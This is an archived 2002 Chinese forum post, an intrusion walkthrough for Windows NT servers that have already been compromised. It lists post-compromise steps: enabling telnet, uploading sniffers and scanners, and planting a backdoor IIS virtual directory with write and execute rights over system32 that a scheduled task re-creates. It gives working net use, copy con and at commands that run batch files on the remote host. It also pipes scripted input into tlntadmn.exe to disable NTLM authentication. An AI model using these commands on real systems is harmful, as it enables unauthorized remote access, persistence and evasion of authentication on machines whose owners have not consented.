发信人: onenightwithyou(小雕)
整理人: williamlong(2002-07-03 12:48:14), 站内信件
|
在telnet服务中如何最快速关闭Ntlm验证
如果你得到了一个主机的Admin权限(如何得到admin权限不在本文的讨论范围),下一步你应该做的大概就是以下几点:
①.打开telnet 服务。
②.上传常用工具。比如:查杀线程工具、端口侦察工具、Sniffer工具,漏洞扫描工具…(反对上传木马,目标太大)。
③.设置一个系统后门。推荐:在iis中设置一个虚拟目录Msado,目录:X:\winnt\system32;权限:目录浏览、执行、写、读。
④.用Sql或nt的AT命令增加一个计划任务,在一个月后重复第③项操作。
我下面要说的就是在打开telnet 服务中会出现的问题。
1. 在服务器端打开telnet 服务
D:\> net use \\203.56.XX.XX\ipc$ "onenight" /user:"onenight"
命令成功完成。
D:\>net use z: \\202.56.XX.XX\c$
命令成功完成。
D:\>copy con z:\a.bat
net start telnet
^Z
已复制 1 个文件。
D:\>at \\203..56.XX.XX 01:05 "c:\a.bat"
命令成功完成。
2.01:05后在客户端用telnet 连接上去,你十有八九得到的如下的提示:
Server allows Ntlm Authentication only
Server has closed connection
原来Nt默认的telnet 服务的身份验证是基于Ntlm的,可否关闭这种验证机制,当然可以:小榕在他的流光软件中附带了一个关闭Ntlm身份验证的软件Ntlm.exe ,只要在服务器的运行Ntlm.exe,就可以完成这个操作。这个方法好虽好可也有缺点:一是上传一个文件有点麻烦;二来如果服务器端有病毒防火墙等东东可能会删除Ntlm.exe 。其实有一个更简单的方法:
①. 在服务器端建立一个文本文件:
D:\>copy con z:\1.txt
3
7
y
0
y
0
0
^Z
已复制 1 个文件。
②.D:\>copy con z:\b.bat
type c:\1.txt |tlntadmn.exe
^Z
已复制 1 个文件。
D:\>at \\203..56.XX.XX 01:15 "c:\b.bat"
命令成功完成。
为使修改生效要停止Telnet服务,在重新启动Telnet 服务一次。
01:15后就可以用telnet顺利连接上去。
这个方法的原理是利用NT本身自带的telnet 服务管理工具:tlntadmn.exe,用管道符|将ntlm身份验证关闭。有兴趣的朋友可以在本机运行tlntadmn,看看他到底提供了哪些功能。
|
|